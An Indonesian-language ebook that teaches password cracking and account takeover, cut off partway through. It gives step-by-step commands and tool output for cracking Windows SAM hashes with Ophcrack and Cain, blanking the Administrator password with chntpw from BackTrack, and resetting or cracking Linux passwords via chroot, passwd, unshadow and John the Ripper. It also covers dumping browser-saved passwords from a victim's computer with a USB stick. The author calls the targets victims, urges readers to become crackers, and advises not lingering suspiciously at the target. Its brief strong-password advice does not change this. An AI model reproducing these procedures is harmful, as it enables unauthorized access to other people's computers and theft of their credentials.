Buku ini memberikan panduan lengkap tentang cracking password secara mudah menggunakan berbagai metode dan perangkat lunak seperti Ophcrack, dengan cara-cara yang dapat dilakukan oleh siapa saja termasuk siswa SD. Buku ini juga memperingatkan bahaya dari kemudahan dalam mencoba cracking password dan menyarankan penggunaan sandi yang kuat dan aman.
1. 1
Tentang buku
Buku ini akan memperlihatkan kepada anda, betapa cracking
itu dapat sangat mudah dilakukan. Penulis buku ini, saya
sendiri bukanlah praktisì keamanan apalagi seorang hacker. Di
bagian 'tentang penulis' telah dijelaskan penulis kelahiran 1991
dan merupakan lulusan SMAK (sekolah menengah analis kimia)
terkenal di Bogor. Yang kita butuhkan untuk menjadi cracker
hanya sebuah niat untuk belajar sepenuh hati, komputer, dan
buku ini tentunya. Pada buku ini juga akan dibahas
penggunaan mesin virtual sebagai alat bantu pada beberapa
kasus cracking. Mesin virtual akan sangat membantu karena
kita akan melakukan cracking pada beberapa OS (Operating
System) dan antar OS.
Pada tiap materi yang dibahas, disematkan screenshoot untuk
mempermudah anda dalam mencerap setiap materi. Juga
disertakan video tutorial jika anda masih merasa kurang jelas
dengan bahasa saya. Ingat! Anak kelas 5 SD juga dapat
menerapkan teknik yang akan saya bahas.
Saya harap buku ini dapat memberikan manfaat maksimal pada
pembaca, minimal akan membuka mata kita lebih lebar tentang
keamanan menggunakan teknologi karena teknologi
berkembang sangat cepat dan kita tidak ingin hanya menjadi
2. 2
penonton apalagi menjadi korban. Bagi pembaca yang
mempunyai cita-cita untuk menjadi seorang cracker handal,
semoga buku ini dapat mendekatkan anda ke cita-cita mulia
tersebut ^^.
3. 3
Password Cracking
Kata sandi atau bahasa kerennya password merupakan
kumpulan karakter atau string yang digunakan untuk
memastikan anda adalah pengguna atau pemilik yang sah atas
sebuah akun ataupun file terproteksi. Sebuah kata sandi dapat
menjadi sangat berguna ketika anda ingin melindungi sebuah
file yang sangat penting dan tidak semua orang boleh
mengaksesnya, namun kata sandi dapat menjadi sangat
menyebalkan ketika anda melupakannya dan ketika anda tidak
mengetahuinya (berarti bukan hak anda :P) untuk itu banyak
organisasi maupun perorangan yang mengembangkan program
untuk membuka sebuah kata sandi rahasia dengan
memanfaatkan kelemahan suatu aplikasi (bug) dan kelemahan
user. Kelemahan user merupakan kunci dari proses cracking,
kelemahan userlah yang akan menentukan tingkat keberhasilan
seorang cracker. Anda akan sependapat dengan saya jika terus
membaca buku ini. Lanjutkan!
Kecepatan dalam mencari password bergantung pada password
yang digunakan dan metode enkripsi yang digunakan. Jika
password dan enkripsi yang digunakan lemah, pencarian
password dapat dilakukan dalam waktu kurang dari 3 menit
(sumpah!) namun untuk enkripsi dan password yang kuat, maka
dewi fortuna akan pergi dari sisi sang cracker atau anda sendiri.
Serangan brutal (brute force)
Metode brute force bisa dibilang adalah tehnik yang paling
efektif dalam melakukan cracking password karena akan 100%
berhasil. Oleh karena itu hingga hari ini brute force attack masih
4. 4
menjadi momok dunia kriptografi dibawah soceng, social
engineering, sebutan keren untuk tipu menipu. Kembali ke soal
serangan brute force, walopun sangat efektif serangan ini bisa
menjadi sangat tidak efisien, tergantung seberapa kuat password
kita. Bingung?? Baiklah. Saya kasih liat demonstasi langsung.
Saya mencoba melakukan cracking NTLM password milik
windows menggunakan program cain dengan metode brute
force. Saya berasumsi password trdiri dari 1-7 karakter yang
terdiri dari karakter lowercase, UPPERCASE, angka, dan
symbol
(abcdefghijklmnopqrstuvwxyzäöüß0123456789!@#$%^&*()-
_+=~`[]{}|:;"'<>,.?/) dan hasilnya password akan terpecahkan
kira-kira dalam waktu 17 hari padahal kecepatan (Key Rate)
menebak dari program cain di computer saya 6.920.111
password per detik!!
5. 5
Sangat tidak efisien kan?
Saya tidak menyarankan anda melakukannya.
Sekarang mari kita berandai-andai. Seandainya ada orang yang
cukup malas membuat password sehingga ia membuat password
sesuai tanggal lahirnya. Yuk! Kita lihat berapa waktu yang
dibutuhkan untuk memecahkan password yang hanya terdiri dari
angka (numeric) yaitu 0123456789
6. 6
Kita hanya membutuhkan waktu kurang dari 2 detik!!
Saya juga tidak menyarankan menggunakan password seperti
itu.
Serangan pintar
ophcrack LiveCD adalah aplikasi yang dibangun di atas
paltform linux yaitu distro slitaz yang berfungsi untuk melakukan
cracking terhadap password windows. Ophcrack bekerja
7. 7
berdasarkan rainbow hash cracking sehingga ophcrack akan
melakukan cracking dalam waktu yang sangat singkat.
Penasaran?
Pertama kali anda harus mendownload file ISO Image
Ophcrack LiveCD (
http://sourceforge.net/project/showfiles.php?group_id=133599&
package_id=167699 ). Kemudian burn ISO Image Ophcrack ke
dalam CD. Anda dapat menggunakan imgburn (
http://www.imgburn.com/ ) atau tools kesayangan anda lainya.
Selain menggunakan CD, dengan sedikit usaha, Ophcrack juga
dapat dijalankan melalui USB Flashdisk. Caranya dengan
.menginstall SLAX ke dalam USB Flashdisk dan menambahkan
modul ophcrack di SLAX serta menyalin Rainbow Tables ke
dalam USB, maka Ophcrack LiveUSB sudah dapat dijalankan
Selain itu, untuk mempersingkat waktu, kita dapat mengambil
file HASH terlebih dahulu yang terletak di /tmp/ophcrack.tmp
dan kemudian melakukan cracking di tempat lain tanpa perlu
menunggu di komputer target dengan mencurigakan.
9. 9
Menggunakan ophcrack
Tak bosan-bosan saya mengatakan "menjadi seorang cracker
itu mudah, siswa SD kelas 5 juga bisa" oleh karena itu jangan
hawatir dan berpikir yang rumit-rumit dahulu. Yang perlu anda
lakukan untuk menggunakan jasa ophcrack yaitu:
Berserah, pasrah pada ophcrack LiveCD
Distro Linux yang satu ini memang sangat memanjakan
konsumenya. Anda akan disuguhkan otomatisasi yang sangat
menghemat energy anda. Selain tidak diperlukan lagi proses
instalasi anda tidak perlu password admin hanya tinggal boot
dan memilih partisi dari windows yang anda ingin crack,
kemudian menunggu hingga ophcrack LiveCD selesai
mengerjakan tugasnya. Ingat!! Sambil menunggu anda enggak
bisa sambil ngopi apalagi menyempatkan diri memasak mie
goreng karena ophcrack LiveCD hanya butuh waktu tak sampai
2 menit untuk menyelesaikan tugasny :P.
John sang cracker yang jasanya kita sewa di bab sebelumnya
juga tercengang melihat ophcrack beraksi. Bila anda tidak
percaya, mungkin screenshot berikut dapat mengubah pikiran
anda.
10. 10
Dapat anda lihat untuk password “doasinfinity” ophcrack LiveCD
hanya membutuhkan waktu 1menit 59 detik (kurang satu detik
untuk mencapai 2menit :P)
11. 11
Jelasin kerja ophcrack LiveCD
Ophcrack dapat melakukan proses dengan sangat cepat
karena ophcrack menggunakan tehnik precomputed hash.
Tehnik ini melakukan perhitungan hash terlebih dahulu dan
menyimpan nilai hash ke dalam rainbow table. Teknik ini
menjadi sangat efektif karena kita tidak perlu melakukan
perhitungan nilai hash lagi. Akan ada sangat banyak waktu
yang kita hemat ^^. Namun tehnik yang hebat pasti
mengharuskan pengorbanan (tumbal) yang berat.
Tumbal itu adalah bandwidth dan space hardisk anda karena
rainbow table ini memiliki ukuran yang sangat besar. Semakin
banyak data dalam tabel maka ukuran rainbow table akan
12. 12
semakin besar. Sebagai bahan pertimbangan, untuk panjang
password 1 sampai 7 karakter alpha-numeric
(ABCDEFGHIJKLMNOPQRSTUVWXYZ) menghabiskan space
lebih dari 600 Mega Byte. Anda tak perlu hawatir karena
ophcrack lengkap dengan rainbow table-nya tersedia dalam
buku ini ^^.
13. 13
Bekerja dengan kastomisasi sendiri
Sebenarnya kita dapat melakukan beberapa konfigurasi untuk
memaksimalkan kerja ophcrack LiveCD sebagai ganti jalan
berserah diri pada ophcrack LiveCD. Hal ini berguna bila tiba-
tiba ophcrack LiveCD tidak berjalan lancar sebagaimana saya
contohkan dan juga untuk menghindari “pembodohan” yang
dilakukan ophcrack LiveCD.
Pertama yang anda lakukan adalah memboot ophcrack LiveCD
seperti biasa. Kemudian tutup window launch.sh yang muncul.
Kemudian buka terminal dan ketik perintah “ophcrack” (tanpa
tanda petik)
14. 14
Langkah pertama (optional)
Langkah ini tidak wajib anda lakukan tapi dapat meningkatkan
kinerja ophcrack . Setelah GUI dari ophcrack muncul anda
dapat menset nomer thread pada tab "preferences" sesuai
jumlah core komputer anda, untuk processor lama set angka ke
2, untuk core 2 duo set 3, dan untuk core 2 duo quad set
menjadi 5.
Masih di tab preferences. Kemudian matikan serangan brute
force karena kita tidak akan menggunakan tehnik “brutal” ini.
15. 15
Langkah kedua (wajib)
Load hash menggunakan tombol load, anda dapat memasukan
nilai hash secara manual (opsi "single hash"), dari file text hasil
pwdump, fgdump dan sebagainya (opsi "PWDUMP file"),
dengan mengekstrak hash dari file SAM dan SYSTEM (opsi
"Encrypted SAM") atau dari filem SAM komputer secara remote
(opsi "Remote SAM")
Pada kesempatan kali ini saya memilih opsi Encrypted SAM.
Sebagaimana kita ketahui Windows XP menyimpan informasi
tentang password di SAM (Security Accounts Manager) di
direktori /WINDOWS/system32/config/sam. Oleh Karena itu
anda cukup meload polder tempat file SAM berada.
Maka ophcrack akan menampilkan semua informasi user yang
terkandung dalam file SAM yaitu:
Administrator, Guest, HelpAssistant, SUPPORT_388945a0,
ahmadi (punyaku :D), victim. Guest, HelpAssistant dan
SUPPORT_388945a0 adalah user yang secara otomatis
digenerate oleh windows, saya juga tidak tahu untuk apa.
Korban kita adalah user bernama “victim” yang dicurigai
menyimpan file terlarang dan kita ingin memeriksanya maka
kita akan meng-crack password milik victim.
16. 16
Untuk mengurangi beban yang dipikul pundak ophcrack anda
dapat menghapus user yang tidak ingin anda crack
menggunakan tombol delete sehingga ophcrack dapat berlari
kencang.
17. 17
Langkah keempat Install tabel
Karena pada kasus ini kita akan mengcrack password
WindowsXp maka kita install dan enable Xp free small rainbow
table. Rainbow table ini telah terdapat di dalam ophcrack
LveCD, jika anda ingin mendownload sendiri dan memilih table
lain anda dapat mengunjungi http://www.freerainbowtables.com/
dan jangan lupa siapkan bandwidth yang cukup besar.
18. 18
Langkah selanjutnya hanya meneekan tombol crack dan
menonton kerja ophcrack yang sangat cepat. Password hasil
cracking dapat dilihat di kolom NT Pwd.
21. 21
Tidak berhubungan dengan password anda yang lain. Selalu
memakai password yang sama untuk berbagai hal sangat
berbahaya. Bahaya.
Jika anda kesulitan dalam menerapkan sarat-sarat tersebut,
anda dapat menggunakan beberapa tool sebagai password
generator seperti PC Tools Password Utilities
(http://www.pctools.com/mirror/passutils.exe)
22. 22
Setelah anda menentukan sendiri spesifikasi password,
kemudian klik “Creat Password(s)” maka anda akan mendapat
password yang SANGAT SULIT DITEBAK. Anda juga dapat
merubah “quantity” untuk mendapatkan beberapa password.
Anda juga dapat mengecek kekuatan password hasil kreasi
anda sendiri di tab “password checker” dengan memasukkan
23. 23
kata sandi anda di field “password”. Saya mencoca
memasukkan password “dodol” dan ternyata menurut PC Tools
Password Utilities “dodol” bukan merupakan password yang
baik.
24. 24
Kemudian saya memasukkan alamat blog saya
“http://technoed-alchemist.co.cc” di field password.
Mengejutkan. Alamat blog saya hanya merupakan Medium
Password. Mungkin karena itu blog terkenal ^^. Sepertinya PC
Tools Password Utilities mengecek password kita apakah
25. 25
mengandung sarat-sarat password yang kuat dan bila tidak
mengandung semua sarat tersebut akan dinilai password yang
lemah.
Satu lagi kehebatan PC Tools Password Utilities. PC Tools
Password Utilities dapat membaca password yang tersembunyi
dibalik asteriks (*)
26. 26
Anda juga dapat men-generate password yang kuat secara
online menggunakan jasa web tertentu seperti
http://strongpasswordgenerator.com/
Bahkan anda dapat membuat password yang sangat kuat
menggunakan software yang tidak ada hubungannya dengan
cracking dan password, yaitu TxTrans buatan om darmal blabla
(Achmad Darmal | www.friendster.com/darmal )
Berikut ini adalah penjelasan tentang TxTrans yang saya
peroleh dari file readme.txt:
TxTrans merupakan tool atau program freeware yang
digunakan untuk membuat tulisan ala hacker dengan
cara mudah seperti "@çHmâd ÐãRmÂ1", wave mode
seperti "aChMaD DaRmAl", serta case dan reverse mode
seperti "LAMRAD DAMHCA"
Petunjuk Penggunaan :
SaN9AT 5€ÐéRHånA, çÚKÙP KétÍK 7ülϧÀñ ÝãNg
4KAn áñdÄ ûÞÅH PÄÐÅ t€x7ßÖ× tèxt soÚ®cE
KÈMúÐÌåÑ kLïk tömßôL 7rÅN5, 5ÍLähKáÑ
êK5pERÍMÊñ DÉngãN T0mÞõ1 1ÂìÑNÝà :)
(sangat sederhana, cukup ketik tulisan yang akan anda
ubah pada text box “text source” kemudian klik tombol
“trans”, silakan eksperimen dengan tombol lainnya :))
27. 27
Dengan menggunakan sebuah password yang kuat maka anda
berhasil melindungi data anda dan berhasil “mengerjai“ sang
cracker. Mau bukti?? Ayo kita coba kemampuan ophcrack
dalam meng-crack medium password dan strong password.
Saya menggunakan kata “D0AsInFiNiTy” dan “d0Ä5íÑfìnÍ7Ý”
pada pengujian kali ini. Berikut ini adalah hasil cracking:
29. 29
Dapat anda lihat ophcrack dapat mengcrack “D0AsInFiNiTy”
dan gagal untuk password “d0Ä5íÑfìnÍ7Ý”
password manager,
tentang encryption,
Bikin cara baca asterisk-kash cara bikin sneadboy portable
bikin tentang keepass
30. 30
Menggunakan <<back|track
Seperti yang anda lihat di bab sebelumnya cracking password
menggunakan metode brute-force bisa dibilang untung-
untungan karena kita tidak tahu seberapa kuat password yang
dibuat oleh target.
Bayangkan kalau si korban menset passwordnya
pÄs5Wõ®Ð6ÚÊnIïïH!. Saya yakin serangan dictionary dan
brute force akan buntu, sementara tehnik precomputed hash
menggunakan ophcrack juga menghasilkan “not found”. Tapi
anda tak perlu hawatir karena selain sangat jarang yang
menggunakan password sesulit pÄs5Wõ®Ð6ÚÊnIïïH. Biasanya
orang menggunakan password yang muda diingat. Ada solusi
lain yaitu dengan mereset password sang korban. Ini solusi bila
password cracking dirasa sudah tidak memungkinkan lagi suai
pepatah “banyak jalan menuju password” dan jalan itu adalah
chntpw buatan Petter N Hagen. Menurut Petter kalau kita
enggak tahu password-nya ya ganti saja. Gitu ajah kok repot.
kan udah ketahuan tuh kalo windows nyimpen password di
SAM (Security Accounts Manager)
/WINDOWS/system32/config/sam.
31. 31
j
ust boot your <<back|track, then open terminal.
Sambil menunggu <<back|track selesai loading saya ingin
mengenalkan SAM lebih dalam karena kita telah berkutat
dengan file ini tapi saya belum menjelaskanny pada anda. Saya
takut buku ini menjadi membosankan, saya sendiri lebih suka
peraktek daripada teori. Berikut ini saya beri kutipan dari
Wikipedia:
Security Accounts Manager (SAM) adalah sebuah basis
data dalam sistem operasi berbasis Windows NT yang
menyimpan informasi mengenai semua akun pengguna
(user account) dan kelompok pengguna (user group).
Selain dimiliki oleh sistem Windows NT secara
individual, basis data ini juga dimiliki oleh domain
32. 32
controller dalam sebuah domain berbasis Windows NT.
Basis data ini juga sering disebut sebagai SAM, Domain
directory database, atau Directory Database.
Basis data SAM pun mengambil sebagian dari registry
Windows NT, dan Windows NT pun mereservasikan
sebuah berkas untuknya, yakni
%systemroot%System32ConfigSAM. Semua akun
pengguna, dan group-nya, serta definisi mengenai
informasi keamanan dalam sumber daya yang dapat
digunakan secara bersama-sama seperti halnya printer
dan berkas disimpan di sini.
SAM menyimpan password milik pengguna dalam
format LM hash atau NTLM hash. Karena fungsi hash
adalah hanya satu arah (anda tidak akan menemukan
aplikasi de-hash ataupun hash2text) maka hal ini dapat
meningkatkan keamanan dalam penyimpanan password.
Untuk meningkatkan keamanan basis data SAM
terhadap beberapa percobaan cracking password secara
offline, Microsoft memperkenalkan utilitas SYSKEY
dalam Windows NT 4.0 Service Pack 4 dan semua versi
terbaru Windows. Berkas SAM tidak dapat dipindahkan,
dihapus atau bahkan disalin selama Windows berjalan.
Tapi, SAM dapat dibaca secara paksa (dump), dan
menampilkan hash password-nya, yang kemudian dapat
diserang dengan menggunakan serangan brute force
attack.
Sebagian besar versi Windows dapat dikonfigurasikan
untuk tidak menyimpan LM hash atau NTLM hash yang
33. 33
valid ketika pengguna mengganti password miliknya,
yang merupakan pengaturan standar dalam Windows
Vista. Perlu diingat, hal ini tidak secara langsung
menghapus nilai LM hash dari dalam SAM, tapi hanya
mengaktifkan sebuah fungsi ekstra selama pengubahan
password yang akan menyimpan sebuah nilai yang acak
di dalam field LM hash di dalam SAM. Nilai yang acak
tersebut tidak memiliki hubungan sama sekali dengan
password milik pengguna, dan nilainya sama untuk
semua pengguna.
LM hash tidak dapat dihitung ketika pengguna memiliki
password dengan panjang lebih dari 14 karakter.
Sehingga, ketika pengguna mengatur password dengan
ukuran lebih dari 15, LM hash juga diset ke nilai acak.
Setelah booting dari CD <<back|track pertama kita cek
status hardisk yang dimount oleh <<back|track
bt ~ # mount
tmpfs on / type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
usbfs on /proc/bus/usb type usbfs
(rw,devgid=10,devmode=0666)
34. 34
/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)
/dev/sda3 on /mnt/sda3 type ext3 (rw,noatime)
/dev/sda5 on /mnt/sda5 type ntfs (ro,noatime)
kalo partisi windowsna masih read only kita akan me-mount
ulang menggunakan command:
FAT mount -o rw /dev/hda# /mnt/hda#
NTFS ntfsmount /dev/hda# /mnt/hda#
untuk itu jalankan perintah:
bt ~ # umount /mnt/sda5
bt ~ # ntfsmount /dev/sda5 /mnt/sda5
tmpfs on / type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
usbfs on /proc/bus/usb type usbfs
(rw,devgid=10,devmode=0666)
/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)
/dev/sda3 on /mnt/sda3 type ext3 (rw,noatime)
/dev/sda5 on /mnt/sda5 type fuse
(rw,nosuid,nodev,default_permissions,allow_other)
kemudian kita langsung ke TE-KA-PEee!!
bt ~ # cd /mnt/hda1/WINDOWS/system32/config
abis itu jalanin program chntpw,
oia..
35. 35
jangan lupa backup dulu file SAM dan system,
buat jaga-jaga ajah,
bt config # cp SAM SAM_backup
bt config # cp system system_backup
bt config # chntpw -i SAM system SECURITY
Kira-kira previewnya seperti ini:
<>==================<> <>==================<>
bt ~ # mount
tmpfs on / type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
usbfs on /proc/bus/usb type usbfs
(rw,devgid=10,devmode=0666)
/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)
/dev/sda3 on /mnt/sda3 type ext3 (rw,noatime)
/dev/sda5 on /mnt/sda5 type ntfs (ro,noatime)
bt ~ # umount /mnt/sda5
bt ~ # ntfsmount /dev/sda5 /mnt/sda5
tmpfs on / type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
usbfs on /proc/bus/usb type usbfs
(rw,devgid=10,devmode=0666)
/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)
/dev/sda3 on /mnt/sda3 type ext3 (rw,noatime)
/dev/sda5 on /mnt/sda5 type fuse
(rw,nosuid,nodev,default_permissions,allow_other)
36. 36
bt ~ # chntpw
chntpw version 0.99.3 040818, (c) Petter N Hagen
chntpw: change password of a user in a NT SAM
file, or invoke registry editor.
chntpw [OPTIONS] <samfile> [systemfile]
[securityfile] [otherreghive] [...]
-h This message
-u <user> Username to change, Administrator is
default
-l list all users in SAM file
-i Interactive. List users (as -l) then ask for
username to change
-e Registry editor. Now with full write support!
-d Enter buffer debugger instead (hex editor),
-t Trace. Show hexdump of structs/segments.
(deprecated debug function)
-v Be a little more verbose (for debuging)
-L Write names of changed files to /tmp/changed
-N No allocation mode. Only (old style) same
length overwrites possible
See readme file on how to extract/read/write the
NT's SAM file
if it's on an NTFS partition!
Source/binary freely distributable. See
README/COPYING for details
NOTE: This program is somewhat hackish! You are on
your own!
bt ~ # cd /mnt/sda5/WINDOWS/system32/config/
bt config # ls
AppEvent.Evt SAM.LOG TempKey.LOG software.LOG
systemprofile/
Internet.evt SECURITY default software.sav
userdiff
ODiag.evt SECURITY.LOG default.LOG system
userdiff.LOG
OSession.evt SecEvent.Evt default.sav system.LOG
SAM SysEvent.Evt software system.sav
37. 37
bt config #
bt config # chntpw -i SAM system SECURITY
chntpw version 0.99.3 040818, (c) Petter N Hagen
Hive's name (from header):
<SystemRootSystem32ConfigSAM>
ROOT KEY at offset: 0x001020 * Subkey indexing
type is: 666c <lf>
File size 24576 [6000] bytes, containing 5 pages
(+ 1 headerpage)
Used for data: 249/19600 blocks/bytes, unused:
6/720 blocks/bytes.
Hive's name (from header): <SYSTEM>
ROOT KEY at offset: 0x001020 * Subkey indexing
type is: 686c <lh>
Page at 0x536000 is not 'hbin', assuming file
contains garbage at end
File size 5505024 [540000] bytes, containing 1282
pages (+ 1 headerpage)
Used for data: 104577/5395424 blocks/bytes,
unused: 2392/23520 blocks/bytes.
Hive's name (from header):
<emRootSystem32ConfigSECURITY>
ROOT KEY at offset: 0x001020 * Subkey indexing
type is: 666c <lf>
Page at 0xe000 is not 'hbin', assuming file
contains garbage at end
File size 262144 [40000] bytes, containing 13
pages (+ 1 headerpage)
Used for data: 1026/46544 blocks/bytes, unused:
8/6288 blocks/bytes.
* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length : 0
Password history count : 0
38. 38
<>========<> chntpw Main Interactive Menu
<>========<>
Loaded hives: <SAM> <system> <SECURITY>
1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something
to save)
What to do? [1] ->
===== chntpw Edit User Info & Passwords ====
RID: 01f4, Username: <Administrator>
RID: 01f5, Username: <Guest>, *disabled or locked*
RID: 03e8, Username: <HelpAssistant>, *disabled or
locked*
RID: 03eb, Username: <kuroro>
RID: 03ea, Username: <SUPPORT_388945a0>, *disabled
or locked*
RID: 03ed, Username: <__vmware_user__>
Select: ! - quit, . - list users, 0x<RID> - User
with RID (hex)
or simply enter the username to change:
[Administrator]
RID : 0500 [01f4]
Username: Administrator
fullname:
comment : Built-in account for administering the
computer/domain
homedir :
39. 39
Account bits: 0x0210 =
[ ] Disabled | [ ] Homedir req. | [ ] Passwd not
req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS
account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv
trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ]
(unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ]
(unknown 0x40) |
Failed login count: 0, while max tries is: 0
Total login count: 0
** LANMAN password not set. User MAY have a blank
password.
** Usually safe to continue
* = blank the password (This may work better than
setting a new password!)
Enter nothing to leave it unchanged
Please enter new password: *
Blanking password!
Do you really wish to change it? (y/n) [n] y
Changed!
Select: ! - quit, . - list users, 0x<RID> - User
with RID (hex)
or simply enter the username to change:
[Administrator] !
<>========<> chntpw Main Interactive Menu
<>========<>
40. 40
Loaded hives: <SAM> <system> <SECURITY>
1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something
to save)
What to do? [1] -> q
Hives that have changed:
# Name
0 <SAM>
Write hive files? (y/n) [n] : y
0 <SAM> - OK
bt config # reboot
<>==================<> <>==================<>
41. 41
Sekarang pasti anda telah berpikir “wah gampang banget ya
ngecrack password windows”. Jika belum berusahalah untuk
memikirkannya.
Suatu hari teman saya mengatakan “kalau begitu gw pake linux
aja deh” setelah saya perlihatkan betapa mudahnya melakukan
cracking password pada Windows. walopun masyarakat kita
yang menggunakan linux masih minim, tetap saja aturan “tidak
ada yang 100% aman” juga berlaku untuk linux dan kerabatnya.
Bahkan dapat dikatakan cracking password linux hanya sedikit
lebih sulit karena perlu menjalankan perintah-perintah yang bagi
sebagian orang sangat sulit karena terbiasa menggunakan wizard
di windows yang sangat memanjakan. Saatnya berubah!
Saya akan memperlihatkan pada anda di bab berikutnya cara
melakukan cracking local password di Linux. Sabar.
42. 42
BAB
Suatu hari anda mendapati komputer di kamar kos anda (anggap
saja!) disusupi file-file porno anda sadar ketika balon peringatan
windows mengatakan “low disk space blabla” dan anda
mencurigai seorang teman anda yang terkenal sebagai hacker
kampus yang sengaja menjadikan hardisk computer anda
sebagai media untuk menyimpan file tabu tersebut. Kemudian
anda berniat mengembalikan file terlarang itu ke sang hacker
kampus (hawatir ia masih butuh) juga ingin balas dendam.
Namun ketika anda booting komputernya yang anda dapati
adalah GRUB loader dari <<back|track 4.
Dengan sedikit putus asa karena operating system yang teman
anda gunakan adalah distronya para pakar keamanan (hacker)
anda pulang dan jalan-jalan ke gramedia. Singkat cerita anda
menemukan buku ini dan melihat salah satu judul bab “cracking
local password linux”.
Pada kasus ini saya membuat skenario yang agak aneh, tapi
intinya saya ingin memperlihatkan pada anda cracking password
linux menggunakan <<back|track 2. Jadi kita akan
mengadu <<back|track 2 VS <<back|track 4.
Kakak melawan adik.
Ya. Saya memang gila.
43. 43
Sperti biasa langkah pertama booting komputer dari live CD
<<back|track 2. Jika pada windows informasi mengenai
user dan password di simpan di file SAM
(/WINDOWS/system32/config), di linux informasi user dan
password disimpan di /etc/passwd dan /etc/shadow. Oleh
karena itu kita "hanya" perlu memodifikasi file shadow ini untuk
dapat menerobos masuk.
Pertama saya menjalan perintah cp untuk mengkopi file shadow.
Tujuannya sebagai backup agar saya dapat mengembalikan file
shadow seperti semula setelah saya selesai “bersenang-senang”.
bt ~ # cd /mnt/sda3/etc
bt ~ # cp shadow shadow_backup
Kemudian saya melakukan mount ulang partisi
<<back|track 4 ke direktori yang kita buat di
<<back|track 2. Di sini saya membuat direktori /mnt/bt4.
bt ~ # mkdir /mnt/bt4
bt ~ # umount /dev/sda3
bt ~ # mount /dev/sda3 /mnt/bt4
44. 44
Kemudian kita ubah direktori root ke direktori yang tadi kita
buat dengan perintah chroot new_directory [command]. Jika
[command] dikosongkan maka akan diset default yaitu
/bin/bash.
bt ~ # chroot /mnt/bt4
dan inilah klimaks dari alur yang kita lakukan. Berikutnya kita
hanya perlu mengganti password user yang kita inginkan:
bt ~ # passwd [username korban]
Kemudian reboot computer korban dan masuk dengan password
baru yang kita buat. Mudah kan??
<>===============<>>> <<<>===============<>
45. 45
BONUS STAGE
Bab ini saya berikan sebagai bonus untuk anda (saya baik
yah??). Di bab bonus ini saya akan menggunakan jasa john
untuk melakukan cracking pada local password linux. Prosesnya
hanya sedikit berbeda dengan cracking Windows di bab
Sebelumnya kita kembalikan file shadow yang tadi kita rusak
(jika anda melakukan percobaan di bab sebelumnya) denga
menjalankan perintah:
bt ~ # cd /mnt/sda3/etc
bt etc # mv shadow_backup shadow
kemudian kita pindah ke direktori john, karena kita akan
bermain di direktori ini:
bt ~ # cd /pentest/password/john-1.7.2/run
kemudian kita unshadow file shadow tadi dan kita simpan di
dump.txt:
bt run # unshadow /mnt/sda3/etc/passwd
/mnt/sda3/etc/shadow > dump.txt
kemudian jalanin john buat ngecrack passwordnya:
bt run # john dump.txt
Sedikit teori, sambil menunggu si john menyelesaikan tugasnya
(proses cracking bisa sangat lama lho..tergantung seberapa kuat
password sang korban)
46. 46
ehemm..
john the ripper merupakan tool geratis untuk password cracking.
John mengombinasikan beberapa password cracker menjadi satu
paket. John dapat mendeteksi tipe hash dan y. it combines a
number of password crackers into one package, autodetects
password hash type, and includes a customizeable cracker. it can
run against various encrypted password formats including DES,
MD4, MD5,KERBEROS AFS, and windows NT/200/XP/2003
LM HASH.
segitu aja ah teorinya and do not try to have me explain all of it!
47. 47
Mencuri Password Menggunakan USB FlashDisk
Mungkin anda tidak menyangka bahwa media penyimpanan
data yang sangat mobile seperti USB FlashDisk dapat menjadi
sebuah media kejahatan yang sangat berbahaya. Saya serius
ketika berkata berbahaya karena USB FlashDisk sebagai dapat
digunakan sebagai senjata oleh para cracker untuk mencuri
password anda tanpa anda ketahui dengan sarat sang cracker
dapat menancapkan USB FlashDisk miliknya ke computer yang
tersimpan password.
Dengan alasan tidak ingin repot, kebanyakan orang (termasuk
saya) menggunakan password manager yang disediakan oleh
banyak aplikasi, browser internet misalnya. Untuk penggunaan
yang sering, memang fitur “remember me” atau “auto complete
password” memang sangat memanjakan, tapi dibalik
kemanjaan itu tersimpan potensi bahaya yang tidak akan
menyenangkan bila anda yang jadi korban. Saya akan
memperlihatkan kepada anda.
Pertama kita butuh software yang berfungsi untuk me-recover
password. Saya tidak akan meminta anda untuk membuat
sendiri password recoverer kok karena di dunia maya sudah
ada banyak sekali yang mengembangkan aplikasi seperti itu
dan GERATIS. Perlu diperhatikan bahwa menurut
pengembang, beberapa antivirus akan memberikan false alarm
untuk tools ini.
48. 48
IE PassView (Internet Explorer Password View)
IE PassView merupakan password revealer untuk menampilkan
password yang tersimpan di Internet Explorer. IE PassView
dapat bekerja dengan baik pada semua versi Internet Explorer,
dari IE 4.0 hingga IE 8.0. setelah anda menjalankan iepv.exe
maka IE PassView akan manampilkan informasi alamat web,
tipe Password (AutoComplete, Password-Protected Web Site,
atau FTP), lokasi (Registry, Credentials File, Protected
Storage), dan tentunya nama user dan passwordnya.
Wah! Ternyata di computer saya tidak ada password yang
disimpan oleh Internet Explorer. Maaf karena saya tidak pernah
menggunakan Internet Explorer di computer ini.
49. 49
PasswordFox (Mozilla Firefox Password View)
PasswordFox ini memungkinkan anda membaca nama user
dan password yang disimpan oleh Mozilla Firefox. Secara
default PasswordFox akan menampilkan username dan
password yang tersimpan di polder Profiles (C:Documents and
Settings[user name]Application
DataMozillaFirefoxProfilestabk8vv1.default), atau anda dapat
mengubah direktori ini di menu File-Select Folder. Setelah anda
menjalankan PasswordFox maka PasswordFox akan
menampilkan informasi seperti : Record Index, Web Site, User
Name, Password, User Name Field, Password Field, dan
Signons filename.
Demi kepentingan saya, password dan username saya samarkan
:P.
System Requirements: Windows 2000, Windows XP,
Windows Server 2003, dan Windows Vista.
50. 50
Mail PassView
Seperti namanya Mail PassView ini bermanfaat untuk
